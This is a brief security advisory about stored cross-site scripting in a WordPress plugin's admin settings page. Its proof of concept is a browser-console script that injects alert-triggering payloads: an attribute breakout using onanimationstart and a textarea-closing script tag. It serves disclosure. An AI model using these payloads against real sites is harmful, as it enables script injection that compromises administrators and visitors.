Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
1. Go to https://example.com/wp-admin/admin.php?page=optik
2. In the browser console, run the code:
```
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' ); inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );let textareas = document.querySelectorAll( '#wpbody-content textarea' ); textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```
3. Save the settings
4. Reload the page and see multiple XSS alerts